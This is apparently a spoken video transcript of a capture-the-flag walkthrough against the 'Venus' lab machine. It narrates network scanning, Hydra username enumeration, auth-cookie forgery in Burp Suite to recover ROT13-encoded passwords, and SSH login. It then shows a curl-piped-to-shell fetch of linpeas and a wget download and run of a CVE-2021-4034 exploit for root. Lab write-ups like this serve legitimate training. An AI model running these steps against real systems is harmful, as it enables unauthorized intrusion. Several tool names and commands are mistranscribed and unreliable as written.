Hi. Today I'm going to show you how to break into a machine called Venus, which is the last machine in the Planet series. I've covered the Earth and Mercury machines in previous videos, so feel free to go check those out if you're interested. As always, my aim in this video is to show you what I did, as well as to give you an explanation for why I'm doing it, and to give you a brief overview of any tools I used. Let's get started. As always, our first step is to identify our target machine. We're going to use the ifconfig command to show our host IP address, and then use nmap to scan that network. Our host IP address is 10.0.2.15, so we're going to use the command nmap space 10.0.2.0/24, which is just the slash notation for anything on the 10.0.2 network. I could also have written this as 10.0.2.1-254. We can see our host machine there, but unlike with the other Planet machines, we can't see any target machine. Let's try an ARP scan. An ARP scan is a method used to map connections between IP addresses and their corresponding MAC addresses in a local network by sending address resolution protocol requests to all devices on the network. We are going to use the command sudo space arp-scan space -l. Sudo lets us run the command with root permissions, which we will need to run an ARP scan. ARP scan is the command itself, and the -l is short for localnet, and tells the system to scan based on the interface configuration rather than from a file. We can see that we have a host on 10.0.2.21, so let's use nmap to scan for any open ports as well as some operating system information using the command nmap space -A space 10.0.2.21. We find that this doesn't work, so let's run the command again, this time using -P n to disable host discover. This time we get a result, and we can see that ports 22 and 8080 are open. Port 8080 is an HTTP proxy, so let's have a look on our web browser and see what there is. It takes us to a login page and tells us that we can log in with the username and password guessed. Sure enough, this takes us to another page with an image and some text about the current status of Venus. Next, we're going to try some directory enumeration and see what we can find. We're going to use ferrixbuster because I like it, but you could just as easily use derb or gobuster or some other enumeration tool. We're going to use the command ferrixbuster space --url space http://10.0.2.21:8080. We can see that it has found a directory called admin, so let's take a look at that. It takes us to another login page. When we try our previous login credentials, we get an error page. Let's go back to our previous page. We know that the username guessed and password guessed are valid credentials. Let's see what happens when we try credentials we know don't work. If we use the username guessed with the password password, we get an invalid password message. When we try another username like user with the password guessed, we get a different message telling us it's an invalid username. Because the system returns a different message when we input an invalid username, we can use a tool called Hydra to enumerate additional users. Hydra is a powerful password cracking tool that can be used to conduct brute force attacks against various network protocols. It runs in the syntax Hydra space username or username list space password or password list space target IP space method space path space request body space an incorrect identifier. Before we can run Hydra, we need a few things. First, we need a list of usernames for Hydra to check against. I'm using one that I downloaded from GitHub, and I'll put the link for it in the description. Name it something obvious, like usernames.txt, and put it in your current working directory. Next, we need to know the HTTP method we are working with, such as get, post, put, etc. As we are submitting credentials to be processed, we know it's going to be post, but there is an easy way to check this. Go to your browser, right-click and click Inspect, and then go to the Network tab. Now input a username and password that we know won't work, and see what happens. You'll see down the bottom under the Method tab that it says Post. Next, we need to tell Hydra how to input each username and password into this web page, so we need to find the request body. Click on the post form within the inspector, and it'll come up with some more information about it. Hit resend. We should now see a section called body. This contains a string that states username equals user and password equals guest, which are the credentials we just tried. For our purposes, we want Hydra to be able to input its own usernames and passwords, so when we go to run our Hydra command, we're going to replace the user with a caret all uppercase user caret and guest with caret all uppercase pass caret. Finally, because we don't know what a successful attempt will look like, we need to tell Hydra what a failed attempt looks like. We know that if we enter an invalid username, then the web page will return a message that says invalid username, so this is what we will use. Every time it sees the message invalid username, it will know that it has failed to find a valid user. Now we are going to run Hydra using this command. Hydra space dash capital L space usernames.txt space dash lowercase p space guest space dash lowercase s space 8080 space 10.0.2.21 space http dash post dash form space and then this long string. The dash capital L tells Hydra that we are going to use a list of usernames. If we wanted to try a single username, we would have used a lowercase l. Usernames.txt is our list of usernames from before that we want to try. The dash lowercase p tells Hydra to use just one password, rather than a list, in which case we would have used a capital P. Guest is the password we're going to try for each user. It doesn't really matter what we put there, because we're only interested in whether usernames are valid. The dash s specifies the port, which in this case is 8080, and is followed by our target IP address of 10.0.2.21. HTTP post form is the method we identified earlier, and that long string is the request body with the username name and password fields substituted for the all capitals user and pass, which allows Hydra to input its own usernames and passwords. Finally, the invalid username is the text that Hydra will look for to identify that a username has failed. We can see that Hydra has found 3 valid usernames: Guest, which we already knew about, Magellan, and Venus. Next, we are going to use a tool called Burp Suite to take a closer look at what is occurring when we log in. Burp Suite is a web application security testing tool that includes a proxy, scanner, and a wide variety of tools for analyzing and manipulating web application traffic. Open up Burp Suite and load into a temporary project using the default settings. Go into the Proxy tab and turn Intercept on. What this does is let us examine what information is being sent and hold it until we decide to push it forward. Go back into your browser and make sure you're using a proxy that's set up for Burp Suite. I use Foxy Proxy because it's convenient, but you can also adjust your proxy settings in Firefox directly. I'll put a link in the description on how to configure Foxy Proxy for Burp Suite if you don't know how to do this. When we try to go to our webpage, you'll see that Burp Suite will intercept and hold the request. Let's log in using our known credentials and see what happens. Allow the connection to proceed by clicking Forward and then click on the History tab and the second form. If we look at our response form, we can see that we have been granted an authentication cookie beginning Z3V. If we select that cookie, Burp Suite tells us that it's encoded in base 64 and can be decoded back to guest:"THRFG, which is presumably the password with some form of encryption on it. If we refresh the page, we see that our authentication cookie stays. Let's see if we can play around with this a bit. We know that another valid user is Venus. Right-click on the third form, which is our refreshed page, and send it to Repeater. Where it says username, we're going to change it to Venus. Then, we want to replace the authentication cookie with one that represents Venus:"THRFG. I'm going to use a shell and the echo command to generate this. Once you have replaced your authentication cookie, click Send. You'll notice that it returns a slightly different authentication cookie. If we select it, Burp Suite will decode it for us and tells us that it is Venus:"IRAHF. Let's repeat the process with our other known username, Magellan. It too returns the username, and a string. Our next step is to decode what we presume to be the passwords for these users. We don't know what encryption method was used on the passwords, but we do have a couple of clues. First, we know the password for guest is guest, and that the encrypted password has the same number of letters and no additional numbers or symbols. We also haven't found anything that could be a key, so this suggests it's a rotation cipher. If we put our string into CyberChef, we can test different rotation ciphers until it decodes it back into our known password of guest. Luckily for us, it is the default ROT13 cipher, though we could have checked other values if necessary. Using the ROT13 cipher, we can decrypt the other two passwords. It seems the password for the Venus account is Venus, and the password for the Magellan account is Venusian Geology 1989. Let's try to SSH into the system using these credentials. Neither the guest or Venus account was successful, but we were able to log in as Magellan. Use the ls command to list files and directories, and we see the user flag. Read it with the cat command. So that's user access done, but we still need root access to complete this machine. On the previous two machines in this series, I used the find command to search for any files which we had root permissions for, but this time I'm going to do something different and use a tool called linps to search for workable exploits. linps is the Linux privilege escalation audit script and is designed to automate the process of identifying privilege escalation vectors on Linux systems. We're going to use the curl command, which is used for making HTTP requests. The command is curl -L space this long URL that you can see and I will also put in the description, space pipe function space sh. The L tells curl to follow any redirects from the server, and then we're piping all of that into a shell. You will see that linps generates a whole lot of information about possible attack vectors, but the section we're really interested in for today is the Linux exploit suggester, which gives us a list of possible CVEs that we can upload and exploit to gain root access. Today, we're going to use CVE-2021-4034, and you can download it from the link shown in linps. Once you have your exploit downloaded, open a fresh bash terminal and navigate to wherever you have your exploit. We need a way of sending it to our target machine, so we're going to use Python to host a simple HTTP server. Use the command python -m http.server/80. This tells bash to run a Python script, the m tells it to run a module, HTTP server is that module, and 80 is the port number. Back on the target machine, we're going to use wget http://10.0.2.15/CVE-2021-4034.zip. If we use the ls, we should now see our exploit has been uploaded as a zip file. Unzip the exploit with the unzip command. Change into our newly extracted directory with the cd command and use ls to show the contents of the directory. All that's left is to run the script. Now we have a root shell. Use the command whoami to verify. Let's change to the root user directory using cd/root, ls to show the contents, and cat to read the root flag. So there you have it. We have completed the Venus machine. There are definitely other ways to use linps, and I'll show them in future videos, but for this one, I wanted to demonstrate just how easy it can be to find and upload exploits to gain root access, and it can save you a lot of time and effort to do it in this way. In summary, we identified our target machine using an ARP scan, used directory enumeration to uncover additional web pages, used Hydra to enumerate additional usernames, and used Burp Suite to monitor what data was being sent. We then manipulated this information to uncover other passwords, which we decrypted and used to SSH onto the target system. From there, we used linps to search for a privilege escalation exploit, which we uploaded and executed on the target machine to give ourselves root access. I hope you enjoyed this video, and good luck in your future hacking exploits.